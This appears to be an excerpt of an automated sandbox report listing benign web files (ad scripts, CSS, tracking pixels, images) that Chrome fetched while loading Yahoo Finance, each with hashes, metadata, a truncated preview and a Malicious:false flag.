                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7619B789D24BE9FCDC5B3A1DB864CA3B8194FA054D5881EEEA7F0D0F8A171705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9C5CF9A3BC9170A9548DC8E36D349D2F751A3238177C60907F54720BF5F94736634DB4A1C12839F5EE5D0D2654F36F4CA87294ADD62CEDEA8709C203A832F61C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var c=window,t=c.document,e="*null",s=[1,9,10];function n(t,e,s,n){if(!t||!e||"function"!=typeof c[t])return n();try{c[t](e,s,(function(c,t){n(c,t)}))}catch(c){n()}}c.COMSCORE={_version:"1.6.6",beacon:function(r){n("__uspapi","getDoNotSell",1,(function(p,f){n("__tcfapi","getTCData",2,(function(n,o){var i=JSON.parse(JSON.stringify(r||{})),_=n&&n.gdprApplies||!1,a=c.YAHOO&&c.YAHOO.comscore||{},d=c.rapidInstance&&c.rapidInstance.getRapidAttribute;if(i.c1=i.c1||"2",i.c2=i.c2||a.c2||"7241469",i.c5=i.c5||d&&d("spaceid"),i.c7=i.c7||t.location.href,i.c8=i.c8||t.title||"",i.c9=i.c9||t.referrer||"",i.c14=i.c14||a.c14||"-1",i.gdpr=_?1:0,i.gdpr_consent="",_){if(o&&n){var u=s.every((c=>!0===n.purpose.consents[c])),l=!0===n.vendor.consents[77];i.cs_ucfr=u&&l?1:u&&l?"":0,i.gdpr_consent=n.tcString||""}}else f&&p&&"boolean"==typeof p.doNotSell?i.cs_ucfr=p.doNotSell?0:1:i.cs_ucfr=0;var g=i.cs_fpid||a.cs_fpid;if(g)if(i.cs_ucfr){var m=i.cs_fpdm||a.cs_fpdm;m&&m!==e?(i.cs_fpdm=m,i.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32027)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):107781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.621257337598043
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:AHepZazzVMczK6CHjJfV31iBf0w8aOz/AY9RxqdOUaeWL5hr:VZanVM4o2MwJ+Cde5h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DCC68F3C20064564688212B72E4C4F1B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C77DCF4E7741D008439DACEF43ABDBBDBE03C025
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:40A67BEB52CCC8B95EEC226140FA622EE4252692DBB21EB54430BB83DB5DC00B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:213EEB59665F240FFE678E6858D7FD6E65683E319984A54A8058BFE93A3E9B11F0D9B6B7C388C7E4113E8C9D7BDB62C4141F6A6C9630A2E2C7D3638E656BF21E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/tag/js/gpt.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):210
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.047955900193768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HrHICMIqSPJJNDSNmogSVoBM4uQoSaCwERMsyI3iaG6sE1jC:HcLcDDSNSn64urSaCw41yI5njC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9CF0D5BFB247F400174FEED513DC8D70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AB2FDA23EE6A185A1406AFCAECB46DF1C4452FCA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DD211715F742BAC09CABCF7BDCA73E6736681C65089CD765CA862C598CABAC0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:640A093CC74333AE3B4AE261AB2C669143AAEE072EA5DBE82DD8F5F6453AC84D735A7B9DB734E003641367D1AC0AC3307B10F49659DC87CA79B9A29B472C2265
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/ReorderHandle.BsIEvvGF.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:canvas.yf-2mvkrb{width:140px;height:25px;float:right}div.yf-5aq78w{width:50px;height:20px}div.expandWidth.yf-5aq78w{display:flex;width:100%}.star-rating.yf-v7fczo{display:flex;justify-content:flex-end;gap:6px}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19711
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.897420488888631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:KYNg7j1n6uLJwp1DZHw2ZZG1iBk6UwvoEbnr2GV7s7jKszz:KYyPB6uGrZLjzBj9brnR3szz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5CE0A6544085B2848F0A075BBF5DEA47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FF97E987B20D3BFE1972F4140D918B0AA3510AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:938F61D61CC3ED132DF70CD704BED5DA1BA7BBB5254E0830662CE9B49E509985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4790418C5B7BB6AFDEB432E1B1F522105D3F72E26206E8A1EBD03707D35786C70C05CDDEF8ACC70549770A434D5513BDF2549E15E8CF842616338BCF5DC89028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (516)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.623566184928948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:jhy2pIRDhKUqaEiFyXEMdsEMXAXNcLAmVWmZjTJjuL6Gqhy2QuzNBhy2o4U1zC4a:jY24kUqaEEcayNcL3V33Jjt3Y2xY2okv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9CAC70F391474011812CF9713BB057CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FCDFFD87A357D6AF15187BB511E0A64675DAF280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4AB4DE8B30256D50C6906D7AC5E6409CD16864C2BC1C5DFB15B702E08CBE2627
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:117C312980B6FDB506CD6FB0F0644034618BA952E604D0B79BD0316AE4F9BF25BE5B915BE7031633059116D7EE48F3D838FAEAA4453FE0B2CDCB7DE911418D88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/TopicPill.Cd876vvj.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.topic-link.yf-nhs2sl{background-color:var(--surface2);gap:var(--space-4);display:inline-flex;color:var(--enabled-active-brand);border:1px solid var(--enabled-active-brand);padding:var(--space-1) var(--space-6);align-items:center;border-radius:var(--border-radius-s);font-size:var(--font-s);cursor:pointer;font-weight:var(--font-medium)}.topic-link.yf-nhs2sl:hover{color:var(--hovered-brand);border-color:var(--hovered-brand)}.topic-link.yf-nhs2sl:active{color:var(--pressed-brand);border-color:var(--pressed-brand)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.21109664847411
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHbuHPk4FUjwAZIAdSfFE7evn:+9mc4sl3O4Cc4FIVIv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:11637EFDD5023C74A30749CDBDF996E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8D377941670A818645AAAD4008EBF2014B186050
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CD9E0584F82F63FC2424620113B1EDC4BA6AF9B27A5DEEB9140F61E1CF54B59C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:309058AFFBD9018BF35929E69FE7BE50F42EA384B3FFDF100CC4D02995ECF050CDFB122AE4C152CAC757F1B20DACF13238773F2CFB66F0CD6EF65786C7A37D12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"/></svg>';export{w as D};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.77995892067657
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:be7DXNMnNfgW5LQCQQLR3Fg5SiRKFWXUe3Fg5SiRKC:be7LN0Nf9QCQeR3FWSiKWl3FWSix
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:88B6E8098774981579B3AA8313B6E85F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:53B2885C042567751F4C49FD1DD34A4417915EAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DA2C6796B3431963D30E6F1100347DF796B02B8609F12CB242410EDE9E4F3314
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D301FBAF59C2E0C347FDC2FDC6A13413311861942FAE181FD32EA11C79630CD1C38732E2C674B90B8B038CC49766E86DECBCFE87AFD38F7EF0B65FBE8BE89495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/sortable.CfnaMg_z.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:svg.yf-1bqur6r{width:100%;height:auto}figure.yf-qqbabn{width:100%;margin:auto}canvas.yf-qqbabn{width:100%;margin:auto}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3702), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3702
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.566953378219462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:jTg0n77+kFjkiUusyuqjuasedCKAHVGaTa0BB5lbvPBQ7B4LsWNmfTdoqjN2mAe1:N7pIfEjuafdCbIzylCu6N2xo/Gq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3341E11442107689EADD6CFB683325EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:03BCF28EC4F4D02AFBDBD8DDF67959FD614C9C31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EAB57E141FB2F53F41579604312E2F833E174D934FC263D58B27C4F27BD4F80C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:94513C31884A203F6524D4E02D9D1C956AE5FA573448AF03E59B65B03C3FA2FBF4A2511E3ED8AC330D1FACCAAC29CCD8EBAC0F21A768580248578EB5DCBD0BB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=38456132&p=137711&s=137812&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://dis.criteo.com/dis/usersync.aspx?r=3&p=4&cp=pubmaticUS&cu=1&&gdpr=0&gdpr_consent=&url=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:@@CRITEO_USERID@@');PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncIframePixel('https://t.adx.opera.com/pub/sync?pubid=pub8730968190912');PubMatic.loadAsyncIframePixel('https://dsp-cookie.adfarm1.adition.com/?ssp=9&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=conversant&uid=AQAJ-JBLklcgHwJ-ptiSAQEBAQEBAQCTQvKIRgEBAJNC8ohG&expiration=1727803286&gpp_sid=-1&gpp=DBAA&is_secure=true&gdpr_consent=&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4348), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.175097086994074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3haIoq1mr8gYdYjeL+Pvq51pNAcllADTyBnmYCoqvpt4bIs:3uuA8gYSjeL+XI1pNZlls+CA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:681D57E9E7CBEF5DE44544C13F8CA62E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:65CFB6398D61FE7CAC86C90DC042095D8E3CD623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF70829B2E58AFC016C35CE9A83E2BB60AD24D6341491686EE168EE71C40123F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2A131198DBB855882D7C7B687650B57133C4375FCEA4E4A86D338A78DCAEAFC18DC5477593429B6B1A599419F108F4BEBE7588BAE7C7831B5EA87D6C2BDF65C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-countdown"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, progressive, precision 8, 970x250, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):111945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.97126150924802
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:4a2JkjI199FNbOqPFYDVG+pVrdkz8ybiarIK:5jI1TFNUGEkzLrIK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3B7B3B633F1D496C35550E39B0F3CB41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:914F5198F179DE770B176338C3556016BB3EFC8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BB5EB1DF5B41C7F01D60927E85F0E30D0493452F8E2BCD797959A665F5E14D87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1F1BA7FED07BDE25A9C40530B6E0B0C3EB9B6D85B79E04804A26373496BD5F70594A257EB855BAF7F62D17C4BE8B9ABE15F61D42328FE616AD204E2AE5CABD79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.654474309626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:hYxu3VHdyC/3KDVU4dtzSwVaRfmfY3fb32FA4Nbx8QL:hYElHMiKhHz+ia94Yvj2FA4NF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8B140F0F0F6E1A0F986CC7D6DFD74D65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E75B9E716E6DF29768EACFA27332F62144BDDA0C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AE57797F708333552A13BCD7293180163E6F38FD11B1A8CD5AA8F05421E5B8FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BF71C5810BE6018D6C5564D4A11965F3543C458CA0AC755C4531796A14AC0A322CB838C4064C344643B0C53CD5074BE7FE6DA48AE6EBDD33B8ED610FEC46D4DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/libtrc/static/topics/taboola-browsing-topics.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Taboola Topics Frame</title>. <script>. (async()=>{. var s=document.referrer;. if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics")). try{. var e=await document.browsingTopics();e.length&&parent.postMessage({topics:e},s). }catch(e){. parent.postMessage({error:e.message},s). }else parent.postMessage({policyMessage:"Topics not allowed in document feature policy in: "+s},s)})();. </script>.</head>.<body>.<div></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.829073741001091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:1epDhjL6Juzb6f6vv7GP4Hdb4mvzBMbupuHFq66Tmu1kR6:1epDmuzb6f6vvCgO+BMIpTkR6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DCD92D658B7861966B270A1B8FA12592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5744080547A39C486A0D43AE259C0BD667500282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4767ACB44BD5AB3CFBE58330F268FFA9E6989917C40FC807E52901DC0FE47B73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2625401364BE5488230D5704E6A6AB0A1B271D4FEB8D7F810F01ADC274AE255E8624DC1F6F882902711782C94AA3B34EA239D2031B8AE597ECEFFA94A1BAF578
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/AccordionItem.COAy-xrR.css
